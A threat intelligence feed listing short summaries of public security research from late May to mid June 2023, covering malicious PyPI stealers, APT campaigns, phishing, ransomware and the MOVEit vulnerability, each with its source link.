Intel Source:
ISC.SANS
Intel Name:
Activity_of_DShield_Honeypot
Date of Scan:
2023-06-12
Impact:
LOW
Summary:
Researchers from SANS have reviewed the DShield honeypot data collected during the previous month, noting how the activity varies from week to week.
Source: https://isc.sans.edu/diary/DShield+Honeypot+Activity+for+May+2023/29932/
2023-06-12
Malicious_PyPI_Packages
LOW
+
Intel Source:
Cyble
Intel Name:
Malicious_PyPI_Packages
Date of Scan:
2023-06-12
Impact:
LOW
Summary:
Cyble Research and Intelligence Labs analysts have been actively tracking malicious Python packages and recently observed several different infostealers. One, dubbed KEKW, was spreading through multiple malicious Python packages. Another was the Creal Stealer, an open-source stealer that has been extensively used by threat actors; although there had previously been no evidence of it being propagated through Python packages, Cyble researchers discovered several Python packages distributing it. Others, such as the TIKCOCK GRABBER, the Hazard Token Grabber and the W4SP stealer, are information stealers that focus on extracting sensitive information from victims' systems. Cyble's analysis revealed that infostealers were the type of malware predominantly propagated through malicious Python packages. The presence of readily accessible infostealer code on platforms like GitHub has enabled multiple threat actors to use this strain of malware in their campaigns.
Source: https://blog.cyble.com/2023/06/09/over-45-thousand-users-fell-victim-to-malicious-pypi-packages/
2023-06-12
A_SaaS_ransomware_attack_against_a_Sharepoint_365
LOW
+
Intel Source:
Obsidian
Intel Name:
A_SaaS_ransomware_attack_against_a_Sharepoint_365
Date of Scan:
2023-06-12
Impact:
LOW
Summary:
Obsidian's Threat Research team has observed a SaaS ransomware attack against a company's SharePoint Online (Microsoft 365) without the use of a compromised endpoint. Obsidian's team and product were leveraged post-compromise to determine the finer details of the attack.
Source: https://www.obsidiansecurity.com/blog/saas-ransomware-observed-sharepoint-microsoft-365/
2023-06-09
Dark_Pink_APT_Group_Return_With_5_Victims_in_New_Countries
LOW
+
Intel Source:
Group-IB
Intel Name:
Dark_Pink_APT_Group_Return_With_5_Victims_in_New_Countries
Date of Scan:
2023-06-09
Impact:
LOW
Summary:
Group-IB researchers have identified new tools, exfiltration mechanisms, and victims in new industries, in countries that Dark Pink has never targeted before. It has continued to attack government, military, and non-profit organizations in the Asia-Pacific expanding its operations to Thailand and Brunei. Another victim, an educational sector organization, has also been identified in Belgium.
Source: https://www.group-ib.com/blog/dark-pink-episode-2/
2023-06-09
North_African_Espionage_Attacks_Using_Stealth_Soldier_Backdoors
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
North_African_Espionage_Attacks_Using_Stealth_Soldier_Backdoors
Date of Scan:
2023-06-09
Impact:
MEDIUM
Summary:
Check Point researchers have identified an ongoing operation against targets in North Africa involving a previously undisclosed multi-stage backdoor called Stealth Soldier. The malware's command-and-control network is part of a larger set of infrastructure, used at least in part for spear-phishing campaigns against government entities.
Source: https://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/
2023-06-09
GobRAT_malware_targeting_Linux_routers
MEDIUM
+
Intel Source:
JPCERT
Intel Name:
GobRAT_malware_targeting_Linux_routers
Date of Scan:
2023-06-09
Impact:
MEDIUM
Summary:
JPCERT/CC has shared details of attacks that infected routers in Japan with malware around February 2023. Their analysis blog describes the attack confirmed by JPCERT/CC and the GobRAT malware used in it. Based on JPCERT's analysis, the initial target was a router whose web UI was exposed to the public; the attacker executes scripts, possibly by exploiting vulnerabilities, and finally infects the router with GobRAT.
Source: https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
2023-06-09
Caffeine_phishing_domains_and_patterns_still_active_despite_store_closure
LOW
+
Intel Source:
Cofense
Intel Name:
Caffeine_phishing_domains_and_patterns_still_active_despite_store_closure
Date of Scan:
2023-06-09
Impact:
LOW
Summary:
Cofense researchers have observed an ongoing and evolving credential phishing campaign, specifically targeting Microsoft Office 365 credentials. The campaign distributes fraudulent emails that aim to deceive recipients into divulging their Office 365 login credentials.
Source: https://cofense.com/blog/caffeine-phishing-service-domains-patterns-still-heavily-used-after-store-seemingly-defunct/
2023-06-09
RomCom_Group_Targeting_Politicians_in_Ukraine_and_US_Based_Healthcare
MEDIUM
+
Intel Source:
Blackberry
Intel Name:
RomCom_Group_Targeting_Politicians_in_Ukraine_and_US_Based_Healthcare
Date of Scan:
2023-06-09
Impact:
MEDIUM
Summary:
Blackberry researchers have observed RomCom targeting politicians in Ukraine who are working closely with Western countries, and a U.S.-based healthcare company providing humanitarian aid to the refugees fleeing from Ukraine and receiving medical assistance in the U.S.
Source: https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine
2023-06-09
The_Details_About_Asylum_Ambuscade_Cybercrime_Group
LOW
+
Intel Source:
Welivesecurity
Intel Name:
The_Details_About_Asylum_Ambuscade_Cybercrime_Group
Date of Scan:
2023-06-09
Impact:
LOW
Summary:
Researchers from Welivesecurity have analyzed the Asylum Ambuscade cybercrime group that has been performing cyberespionage operations on the side and provided details about the early 2022 espionage campaign and about multiple cybercrime campaigns in 2022 and 2023.
Source: https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/
2023-06-08
Zero_Day_Flaw_in_Barracuda_Email_Security_Gateway_Appliances
MEDIUM
+
Intel Source:
Barracuda
Intel Name:
Zero_Day_Flaw_in_Barracuda_Email_Security_Gateway_Appliances
Date of Scan:
2023-06-08
Impact:
MEDIUM
Summary:
Researchers from Barracuda have urged their customers who were impacted by a recently disclosed zero-day flaw in its Email Security Gateway (ESG) appliances to immediately replace them.
Source: https://www.barracuda.com/company/legal/esg-vulnerability
2023-06-08
The_Return_of_Vacation_Request_Phishing_Emails
LOW
+
Intel Source:
Cofense
Intel Name:
The_Return_of_Vacation_Request_Phishing_Emails
Date of Scan:
2023-06-08
Impact:
LOW
Summary:
Cofense researchers have observed a phishing campaign in which the threat actor sends an email claiming to be from the 'HR Department' and provides the user with a link to submit their annual leave requests.
Source: https://cofense.com/blog/summer-time-scams-the-return-of-vacation-request-phishing-emails/
2023-06-08
Hackers_Distributing_Malicious_Job_Application_Letters
LOW
+
Intel Source:
ASEC
Intel Name:
Hackers_Distributing_Malicious_Job_Application_Letters
Date of Scan:
2023-06-08
Impact:
LOW
Summary:
ASEC researchers have identified that malware disguised as a job application letter is continuously being distributed. This malware is equipped with a feature that checks for the presence of various antivirus processes.
Source: https://asec.ahnlab.com/en/53744/
2023-06-07
The_Examination_of_TargetCompany_Ransomware
LOW
+
Intel Source:
TrendMicro
Intel Name:
The_Examination_of_TargetCompany_Ransomware
Date of Scan:
2023-06-07
Impact:
LOW
Summary:
TrendMicro researchers have identified that each major update by the threat actors behind TargetCompany ransomware entailed a change in the encryption algorithm and in decryptor characteristics. These are accompanied by a change in file name extensions, hence the succession of names by which the ransomware group is known.
Source: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-targetcompany
2023-06-07
ITG10_Group_Targeting_South_Korean_Entities
LOW
+
Intel Source:
IBM Security Intelligence
Intel Name:
ITG10_Group_Targeting_South_Korean_Entities
Date of Scan:
2023-06-07
Impact:
LOW
Summary:
IBM Security researchers have uncovered documents that are most likely part of a phishing campaign mimicking credible senders, orchestrated by a group X-Force refers to as ITG10, and aimed at delivering RokRAT malware.
Source: https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/
2023-06-07
Hackers_Targeting_Korean_Users_via_Malicious_Document_Files
LOW
+
Intel Source:
Cyble
Intel Name:
Hackers_Targeting_Korean_Users_via_Malicious_Document_Files
Date of Scan:
2023-06-07
Impact:
LOW
Summary:
Cyble researchers have discovered an ongoing campaign associated with the notorious ransomware group LockBit. It has once again embraced the approach of disseminating malware through malicious document files targeting Korean individuals. Notably, the group utilized the same template injection techniques to deliver their payload.
Source: https://blog.cyble.com/2023/06/06/lockbit-ransomware-2-0-resurfaces/
2023-06-07
North_Korean_TAG71_Group_Spoofs_Asian_and_US_Financial_Institutions
MEDIUM
+
Intel Source:
Recorded Future
Intel Name:
North_Korean_TAG71_Group_Spoofs_Asian_and_US_Financial_Institutions
Date of Scan:
2023-06-07
Impact:
MEDIUM
Summary:
Recorded Future researchers have discovered malicious cyber threat activity spoofing several financial institutions and venture capital firms in Japan, Vietnam, and the United States. They refer to the group behind this activity as Threat Activity Group 71 (TAG-71). They also identified 74 domains resolving to 5 IP addresses, as well as 6 malicious files, in the most recent cluster of activity from September 2022 to March 2023.
Source: https://go.recordedfuture.com/hubfs/reports/cta-2023-0606.pdf
2023-06-07
Qakbot_Retool_Reinfect_Recycle
LOW
+
Intel Source:
Lumen
Intel Name:
Qakbot_Retool_Reinfect_Recycle
Date of Scan:
2023-06-07
Impact:
LOW
Summary:
Lumen researchers analyzed recent Qakbot campaigns to gain insight into its network structure, and gained key insights into the methods that support Qakbot's reputation as an evasive and tenacious threat.
Source: https://blog.lumen.com/qakbot-retool-reinfect-recycle/?utm_source=substack&utm_medium=email
2023-06-06
Detection_and_Analysis_of_RedLine_Stealer
LOW
+
Intel Source:
Splunk
Intel Name:
Detection_and_Analysis_of_RedLine_Stealer
Date of Scan:
2023-06-06
Impact:
LOW
Summary:
RedLine Stealer is a malware strain designed to steal sensitive information from compromised systems. It is typically distributed through phishing emails, social engineering tactics, and malicious URL links.
Source: https://www.splunk.com/en_us/blog/security/do-not-cross-the-redline-stealer-detections-and-analysis.html
2023-06-06
Hackers_Take_Over_Legitimate_Sites_to_Host_Credit_Card_Stealer_Scripts
LOW
+
Intel Source:
Akamai
Intel Name:
Hackers_Take_Over_Legitimate_Sites_to_Host_Credit_Card_Stealer_Scripts
Date of Scan:
2023-06-06
Impact:
LOW
Summary:
Akamai researchers have observed a new Magecart credit card stealing campaign that hijacks legitimate sites to act as "makeshift" command and control (C2) servers in order to inject and hide skimmers on targeted eCommerce sites.
Source: https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains
2023-06-06
New_Social_Engineering_Campaign_Aims_to_Steal_Credentials_and_Gather_Strategic_Intelligence
MEDIUM
+
Intel Source:
Sentinelone
Intel Name:
New_Social_Engineering_Campaign_Aims_to_Steal_Credentials_and_Gather_Strategic_Intelligence
Date of Scan:
2023-06-06
Impact:
MEDIUM
Summary:
SentinelLabs researchers have tracked a social engineering campaign by the North Korean APT group Kimsuky targeting experts in North Korean affairs, part of a broader campaign discussed in a recent NSA advisory.
Source: https://www.sentinelone.com/labs/kimsuky-new-social-engineering-campaign-aims-to-steal-credentials-and-gather-strategic-intelligence/
2023-06-06
MOVEit_Transfer_Critical_Vulnerability
LOW
+
Intel Source:
Huntress
Intel Name:
MOVEit_Transfer_Critical_Vulnerability
Date of Scan:
2023-06-06
Impact:
LOW
Summary:
Researchers from Huntress have investigated the exploitation of the critical MOVEit Transfer vulnerability CVE-2023-34362.
Source: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
2023-06-06
Cyberespionage_Against_Ukrainian_State_Bodies_and_Media
MEDIUM
Intel Source:
CERT-UA
Intel Name:
Cyberespionage_Against_Ukrainian_State_Bodies_and_Media
Date of Scan:
2023-06-06
Impact:
MEDIUM
Summary:
CERT-UA researchers have identified that files (.HTA, .EXE, .RAR, .LNK) are being distributed by unknown persons via e-mail and instant messengers; launching them leads to the victim's computer being infected with the LONEPAGE malicious program.
Source: https://cert.gov.ua/article/4818341
2023-06-05
Chinese_Hackers_Using_Modified_Cobalt_Strike_Variant_to_Attack_Taiwanese_Critical_Infrastructure
LOW
Intel Source:
Eclecticiq
Intel Name:
Chinese_Hackers_Using_Modified_Cobalt_Strike_Variant_to_Attack_Taiwanese_Critical_Infrastructure
Date of Scan:
2023-06-05
Impact:
LOW
Summary:
EclecticIQ researchers have identified a malicious web server, very likely operated by a Chinese threat actor, used to target Taiwanese government entities, including critical infrastructure.
Source: https://blog.eclecticiq.com/chinese-threat-actor-used-modified-cobalt-strike-variant-to-attack-taiwanese-critical-infrastructure
2023-06-05
Return_of_GuLoader_VBScript_Variant_with_PowerShell_Updates
LOW
Intel Source:
Esentire
Intel Name:
Return_of_GuLoader_VBScript_Variant_with_PowerShell_Updates
Date of Scan:
2023-06-05
Impact:
LOW
Summary:
GuLoader is a sophisticated malware loader which has heavily abused tax-themed lures. TRU reported on ongoing GuLoader activity using tax-themed lures and decoy files, and identified an updated VBScript GuLoader variant across multiple customers.
Source: https://www.esentire.com/blog/guloader-vbscript-variant-returns-with-powershell-updates
2023-06-05
Diving_Deep_into_Red_Deer
LOW
Intel Source:
Perception Point
Intel Name:
Diving_Deep_into_Red_Deer
Date of Scan:
2023-06-05
Impact:
LOW
Summary:
Researchers from Perception Point have deeply analyzed a malware campaign crafted specifically for the Israeli audience called Red Deer.
Source: https://perception-point.io/blog/operation-red-deer/
2023-06-05
Analysis_of_XeGroups_Attack_Techniques_Detected
LOW
Intel Source:
Menlo Security
Intel Name:
Analysis_of_XeGroups_Attack_Techniques_Detected
Date of Scan:
2023-06-05
Impact:
LOW
Summary:
XeGroup’s tactics, techniques, and procedures have been detailed in a report by Volexity, which suggests that the group may be associated with other cybercriminal organizations and may have links to state-sponsored hacking groups.
Source: https://www.menlosecurity.com/blog/not-your-average-joe-an-analysis-of-the-xegroups-attack-techniques/
2023-06-05
Detection_of_Carbon_Black_TrueBot_Malware
LOW
Intel Source:
VMware
Intel Name:
Detection_of_Carbon_Black_TrueBot_Malware
Date of Scan:
2023-06-05
Impact:
LOW
Summary:
VMware’s Carbon Black Managed Detection and Response (MDR) team began seeing a surge of TrueBot activity. TrueBot is under active development by Silence, with recent versions using a Netwrix vulnerability for delivery.
Source: https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html
2023-06-03
The_Camaro_Dragon_Strikes_with_a_New_TinyNote_Backdoor
LOW
Intel Source:
Checkpoint
Intel Name:
The_Camaro_Dragon_Strikes_with_a_New_TinyNote_Backdoor
Date of Scan:
2023-06-03
Impact:
LOW
Summary:
Checkpoint researchers have observed that a Chinese nation-state group known as Camaro Dragon has been linked to yet another backdoor that's designed to meet its intelligence-gathering goals.
Source: https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/
2023-06-03
Lancefly_APT_Targets_Governments_Aviation_and_Organizations_with_Custom_Backdoors
LOW
Intel Source:
Symantec
Intel Name:
Lancefly_APT_Targets_Governments_Aviation_and_Organizations_with_Custom_Backdoors
Date of Scan:
2023-06-03
Impact:
LOW
Summary:
Researchers from Symantec have identified that the Lancefly APT group has been using custom backdoors for several years to target organizations in South and Southeast Asia.
Source: https://symantec-enterprise-blogs.security.com/blogs/japanese/lancefly-aptkurufukasutamuhatsukutoatezhengfuyahangkongbumennatonozuzhiwobiaodeni
2023-06-02
New_unidentified_botnet_campaign_Horabot
LOW
Intel Source:
Talos
Intel Name:
New_unidentified_botnet_campaign_Horabot
Date of Scan:
2023-06-02
Impact:
LOW
Summary:
Cisco Talos researchers have identified a previously unidentified botnet program, which Talos is calling "Horabot," that delivers a known banking trojan and spam tool onto victim machines in a campaign.
Source: https://blog.talosintelligence.com/new-horabot-targets-americas/
2023-06-02
Who_and_What_Threatens_the_World_Column_exe_malware
LOW
Intel Source:
ReversingLabs
Intel Name:
Who_and_What_Threatens_the_World_Column_exe_malware
Date of Scan:
2023-06-02
Impact:
LOW
Summary:
The ReversingLabs research team has identified a novel attack on PyPI using compiled Python code to evade detection, possibly the first attack to take advantage of PYC file direct execution.
Source: https://www.reversinglabs.com/blog/when-python-bytecode-bites-back-who-checks-the-contents-of-compiled-python-files
2023-06-02
Previously_unknown_malware_attacked_IOS_devices
LOW
Intel Source:
Securelist
Intel Name:
Previously_unknown_malware_attacked_IOS_devices
Date of Scan:
2023-06-02
Impact:
LOW
Summary:
While monitoring the network traffic of the Securelist corporate Wi-Fi network, the researchers observed suspicious activity that originated from several iOS-based phones. Because it was impossible to inspect modern iOS devices from the inside, the researchers created offline backups of the devices in question, inspected them using the Mobile Verification Toolkit's mvt-ios and discovered traces of compromise. They called this campaign "Operation Triangulation".
Source: https://securelist.com/operation-triangulation/109842/
2023-06-02
SharpPanda_APT_Campaign_Expands
LOW
Intel Source:
Cyble
Intel Name:
SharpPanda_APT_Campaign_Expands
Date of Scan:
2023-06-02
Impact:
LOW
Summary:
Cyble researchers observed an ongoing campaign by SharpPanda APT. This APT group has a history of targeting government officials, particularly in Southeast Asian countries. This latest campaign specifically targets high-level government officials from G20 nations.
Source: https://blog.cyble.com/2023/06/01/sharppanda-apt-campaign-expands-its-arsenal-targeting-g20-nations/
2023-06-02
Operation_CMDStealer
LOW
Intel Source:
Blackberry
Intel Name:
Operation_CMDStealer
Date of Scan:
2023-06-02
Impact:
LOW
Summary:
BlackBerry researchers have identified that an unknown financially motivated threat actor, very likely from Brazil, is targeting Spanish- and Portuguese-speaking victims with the goal of stealing online banking access. The victims are primarily in Portugal, Mexico, and Peru. This threat actor employs tactics such as LOLBaS (Living Off the Land Binaries and Scripts), along with CMD-based scripts, to carry out its malicious activities.
Source: https://blogs.blackberry.com/en/2023/05/cmdstealer-targets-portugal-peru-and-mexico
2023-06-02
Operation_Magalenha
LOW
Intel Source:
Sentinelone
Intel Name:
Operation_Magalenha
Date of Scan:
2023-06-02
Impact:
LOW
Summary:
SentinelLabs has been tracking a campaign over the first quarter of 2023 targeting users of Portuguese financial institutions, including government, government-backed, and private institutions.
Source: https://de.sentinelone.com/wp-content/uploads/pdf-gen/1684978893/operation-magalenha-long-running-campaign-pursues-portuguese-credentials-and-pii.pdf
2023-06-01
A_new_Quasar_variant_SeroXen_RAT
LOW
Intel Source:
AT&T
Intel Name:
A_new_Quasar_variant_SeroXen_RAT
Date of Scan:
2023-06-01
Impact:
LOW
Summary:
AT&T Alien Labs researchers reviewed recent malicious samples of a new Quasar variant observed by Alien Labs in the wild, SeroXen. This new RAT is a modified branch of the open-source version, adding some modified features to the original RAT.
Source: https://cybersecurity.att.com/blogs/labs-research/seroxen-rat-for-sale
2023-06-01
The_connections_between_BlackSuit_and_Royal_ransomware
LOW
Intel Source:
TrendMicro
Intel Name:
The_connections_between_BlackSuit_and_Royal_ransomware
Date of Scan:
2023-06-01
Impact:
LOW
Summary:
Researchers from Trendmicro analyzed BlackSuit ransomware and how it compares to Royal ransomware. Several researchers on Twitter discovered a new ransomware family called BlackSuit that targeted both Windows and Linux users. Some Twitter posts also mentioned connections between BlackSuit and Royal, which triggered Trendmicro researchers' interest. Trendmicro researchers shared in their blog the analysis of a Windows 32-bit sample of the ransomware from Twitter.
Source: https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html
2023-06-01
The_attacks_against_Apache_NiFi
LOW
Intel Source:
ISC. SANS
Intel Name:
The_attacks_against_Apache_NiFi
Date of Scan:
2023-06-01
Impact:
LOW
Summary:
On May 19th, Johannes Ullrich, ISC SANS analyst, noted a rapid increase in requests targeting Apache NiFi. Apache NiFi describes itself as "an easy-to-use, powerful, and reliable system to process and distribute data." At least one actor is actively scanning the Internet for unprotected instances of Apache NiFi. That threat actor adds processors in Apache NiFi to install a crypto coin miner and then performs lateral movement by searching the server for SSH credentials.
Source: https://isc.sans.edu/diary/rss/29900
2023-06-01
Distribution_of_Malware_Disguised_as_Hancom_Office_Document_File_Detected
LOW
Intel Source:
ASEC
Intel Name:
Distribution_of_Malware_Disguised_as_Hancom_Office_Document_File_Detected
Date of Scan:
2023-06-01
Impact:
LOW
Summary:
AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware disguised as Hancom Office document files. The malware that is being distributed is named “Who and What Threatens the World (Column).exe” and is designed to deceive users by using an icon that is similar to that of Hancom Office.
Source: https://asec.ahnlab.com/en/53377/
2023-06-01
The_deeper_techniques_of_sLoad_Ramnit_and_drIBAN
LOW
Intel Source:
Cleafy
Intel Name:
The_deeper_techniques_of_sLoad_Ramnit_and_drIBAN
Date of Scan:
2023-06-01
Impact:
LOW
Summary:
Cleafy analysts shared in their blog the deeper techniques that made them connect the sLoad, Ramnit, and drIBAN malware families. The analysts provided some Ramnit characteristics and the techniques used to perform the MiTB attack and deliver its injection kit.
Source: https://www.cleafy.com/cleafy-labs/uncovering-driban-fraud-operations-chapter-2
2023-06-01
Gigabyte_App_Center_Backdoor_risk
LOW
Intel Source:
Eclypsium
Intel Name:
Gigabyte_App_Center_Backdoor_risk
Date of Scan:
2023-06-01
Impact:
LOW
Summary:
Recently, the Eclypsium platform observed some suspicious backdoor behavior inside Gigabyte systems. Their detectors flagged new, previously unknown supply chain threats, where legitimate third-party technology products or updates have been compromised. The Eclypsium analysis discovered that firmware in Gigabyte systems is dropping and executing a Windows native executable file during the system startup process, and this executable then downloads and executes additional payloads insecurely. It uses the same techniques as other OEM backdoor-like features such as the Computrace backdoor (a.k.a. LoJack DoubleAgent) abused by threat actors, and even firmware implants such as Sednit LoJax, MosaicRegressor, and Vector-EDK.
Source: https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/
2023-05-31
AceCryptor_cruptor_operation
LOW
Intel Source:
WeliveSecurity
Intel Name:
AceCryptor_cruptor_operation
Date of Scan:
2023-05-31
Impact:
LOW
Summary:
ESET researchers shared details about a widespread cryptor, operating as a cryptor-as-a-service, used by tens of malware families.
Source: https://www.welivesecurity.com/2023/05/25/shedding-light-acecryptor-operation/
2023-05-31
CryptoClippy_actively_expanding_its_capabilities
LOW
Intel Source:
Intezer
Intel Name:
CryptoClippy_actively_expanding_its_capabilities
Date of Scan:
2023-05-31
Impact:
LOW
Summary:
Intezer analysts shared the details of the indication that the threat actors behind CryptoClippy are actively expanding its capabilities, now targeting a broader range of payment services commonly used in Brazil.
Source: https://intezer.com/blog/research/cryptoclippy-evolves-to-pilfer-more-financial-data/
2023-05-31
DocuSign_email_opens_to_script_based_infection
LOW
Intel Source:
ISC. SANS
Intel Name:
DocuSign_email_opens_to_script_based_infection
Date of Scan:
2023-05-31
Impact:
LOW
Summary:
Twitter user @0xToxin has recently discovered malicious emails imitating DocuSign with HTML attachments.
Source: https://isc.sans.edu/diary/rss/29888
2023-05-31
ChatGPT_safisticated_Phishing_Scam
LOW
Intel Source:
Inky
Intel Name:
ChatGPT_safisticated_Phishing_Scam
Date of Scan:
2023-05-31
Impact:
LOW
Summary:
Inky researchers observed that cybercriminals have begun impersonating the ChatGPT brand in a sophisticated, personalized phishing campaign.
Source: https://www.inky.com/en/blog/fresh-phish-chatgpt-impersonation-fuels-a-clever-phishing-scam
2023-05-30
Chinese_APT_Group_BRONZE_SILHOUETTE_Targeting_US_Government_and_Defense_Organizations
MEDIUM
Intel Source:
NSA / Secureworks
Intel Name:
Chinese_APT_Group_BRONZE_SILHOUETTE_Targeting_US_Government_and_Defense_Organizations
Date of Scan:
2023-05-30
Impact:
MEDIUM
Summary:
SecureWorks researchers have discovered a cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.
Source: https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
2023-05-30
Obsidian_ORB_Ransomware_Demanding_Payment_With_Gift_Cards
LOW
Intel Source:
Cyble
Intel Name:
Obsidian_ORB_Ransomware_Demanding_Payment_With_Gift_Cards
Date of Scan:
2023-05-30
Impact:
LOW
Summary:
Cyble researchers have come across a new and unique ransomware strain named Obsidian ORB. Extensive analysis has revealed compelling evidence that suggests a significant correlation between Obsidian ORB Ransomware and the underlying source code of the notorious Chaos ransomware.
Source: https://blog.cyble.com/2023/05/25/obsidian-orb-ransomware-demands-gift-cards-as-payment/
2023-05-30
The_Invicta_Stealer_Spreading
LOW
Intel Source:
Cyble
Intel Name:
The_Invicta_Stealer_Spreading
Date of Scan:
2023-05-30
Impact:
LOW
Summary:
The Cyble Research Lab team discovered a new stealer called Invicta Stealer. The developer in charge of this malware is heavily involved on social media platforms, utilizing them to promote their information stealer and its lethal capabilities.
Source: https://blog.cyble.com/2023/05/25/invicta-stealer-spreading-through-phony-godaddy-refund-invoices/
2023-05-30
Ducktail_Malware_targets_a_high_profile_accounts
LOW
Intel Source:
Cyble
Intel Name:
Ducktail_Malware_targets_a_high_profile_accounts
Date of Scan:
2023-05-30
Impact:
LOW
Summary:
Cyble researchers recently discovered Ducktail malware that specifically targets Marketing and HR professionals. The malware is designed to extract browser cookies and take advantage of social media sessions to steal sensitive information from the victim's Social Media account. The purpose of the malware operation is to gain control of Social Media Business accounts with adequate access privileges. TAs then use their acquired access to run advertisements for their financial gain.
Source: https://blog.cyble.com/2023/05/17/ducktail-malware-focuses-on-targeting-hr-and-marketing-professionals/
2023-05-29
Legion_Malware_Targeting_SSH_Servers_and_AWS_Credentials
LOW
Intel Source:
CADO Security
Intel Name:
Legion_Malware_Targeting_SSH_Servers_and_AWS_Credentials
Date of Scan:
2023-05-29
Impact:
LOW
Summary:
CADO Security researchers have identified that an updated version of the commodity malware called Legion comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch.
Source: https://www.cadosecurity.com/updates-to-legion-a-cloud-credential-harvester-and-smtp-hijacker/
2023-05-29
Hackers_Targeting_Users_of_Portuguese_Financial_Institutions
MEDIUM
Intel Source:
Sentinelone
Intel Name:
Hackers_Targeting_Users_of_Portuguese_Financial_Institutions
Date of Scan:
2023-05-29
Impact:
MEDIUM
Summary:
SentinelOne researchers have observed a campaign targeting users of Portuguese financial institutions conducted by a Brazilian threat group. The attackers can steal credentials and exfiltrate users’ data and personal information, which can be leveraged for malicious activities beyond financial gain.
Source: https://www.sentinelone.com/labs/operation-magalenha-long-running-campaign-pursues-portuguese-credentials-and-pii/
2023-05-28
Phishing_Delivering_via_Encrypted_Messages
MEDIUM
Intel Source:
Trustwave
Intel Name:
Phishing_Delivering_via_Encrypted_Messages
Date of Scan:
2023-05-28
Impact:
MEDIUM
Summary:
Trustwave researchers have observed phishing attacks that use a combination of compromised Microsoft 365 accounts and .rpmsg encrypted emails to deliver the phishing message.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-encrypted-restricted-permission-messages-deliver-phishing/
2023-05-27
COSMICENERGY_new_OT_Malware_related_to_Russia
MEDIUM
Intel Source:
Mandiant
Intel Name:
COSMICENERGY_new_OT_Malware_related_to_Russia
Date of Scan:
2023-05-27
Impact:
MEDIUM
Summary:
Mandiant discovered a new operational technology (OT) / industrial control system (ICS) malware, recognized as COSMICENERGY, uploaded by a threat actor in Russia. The malware is capable of causing electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia.
Source: https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response
2023-05-27
Cyber_Crime_Forum_Offers_DDoS_As_A_Service_by_Russian_Hacktivists
LOW
Intel Source:
Cyble
Intel Name:
Cyber_Crime_Forum_Offers_DDoS_As_A_Service_by_Russian_Hacktivists
Date of Scan:
2023-05-27
Impact:
LOW
Summary:
Cyble Research and Intelligence Labs (CRIL) has made a significant discovery on a cybercrime forum - a newly identified malware strain called "MDBotnet." Our analysis suggests that this malware is believed to originate from a Threat Actor (TA) linked to Russia.
Source: https://blog.cyble.com/2023/05/23/new-mdbotnet-unleashes-ddos-attacks/
2023-05-27
Israeli_Logistics_Industry_targeted_by_hackers
LOW
Intel Source:
ClearSky
Intel Name:
Israeli_Logistics_Industry_targeted_by_hackers
Date of Scan:
2023-05-27
Impact:
LOW
Summary:
ClearSky Cyber Security researchers have discovered a watering hole attack on at least eight Israeli websites. The attack was most likely orchestrated by a nation-state actor from Iran, with some attribution to Tortoiseshell (also called TA456 or Imperial Kitten). The infected sites collect preliminary user information through a script.
Source: https://www.clearskysec.com/fata-morgana/
2023-05-27
Israeli_Logistics_Industry_attacked_by_hackers
LOW
Intel Source:
ClearSky
Intel Name:
Israeli_Logistics_Industry_attacked_by_hackers
Date of Scan:
2023-05-27
Impact:
LOW
Summary:
ClearSky Cyber Security researchers have discovered a watering hole attack on at least eight Israeli websites. The attack was most likely orchestrated by a nation-state actor from Iran, with some attribution to Tortoiseshell (also called TA456 or Imperial Kitten). The infected sites collect preliminary user information through a script.
Source: https://www.clearskysec.com/fata-morgana/
2023-05-27
Link_Found_Between_Korean_VPN_Installations_and_MeshAgent_Infections
LOW
Intel Source:
ASEC
Intel Name:
Link_Found_Between_Korean_VPN_Installations_and_MeshAgent_Infections
Date of Scan:
2023-05-27
Impact:
LOW
Summary:
AhnLab Security Emergency response Center (ASEC) has previously covered the case where SparkRAT was distributed contained within a Korean VPN’s installer in the post, “SparkRAT Being Distributed Within a Korean VPN Installer”[1]. This VPN was commonly installed by Chinese users who required better access to the Internet, and the problem was addressed after the blog post was uploaded.
Source: https://asec.ahnlab.com/en/53267/
2023-05-27
Ongoing_Kimsuky_Campaign_Utilizing_Custom_Reconnaissance_Toolkit
MEDIUM
Intel Source:
Sentinelone
Intel Name:
Ongoing_Kimsuky_Campaign_Utilizing_Custom_Reconnaissance_Toolkit
Date of Scan:
2023-05-27
Impact:
MEDIUM
Summary:
SentinelLabs has been tracking a targeted campaign against information services, as well as organizations supporting human rights activists and defectors in relation to North Korea. The campaign focuses on file reconnaissance and exfiltrating system and hardware information, laying the groundwork for subsequent precision attacks.
Source: https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/
2023-05-27
Volt_Typhoon_stealthy_activity
HIGH
Intel Source:
Microsoft, CISA
Intel Name:
Volt_Typhoon_stealthy_activity
Date of Scan:
2023-05-27
Impact:
HIGH
Summary:
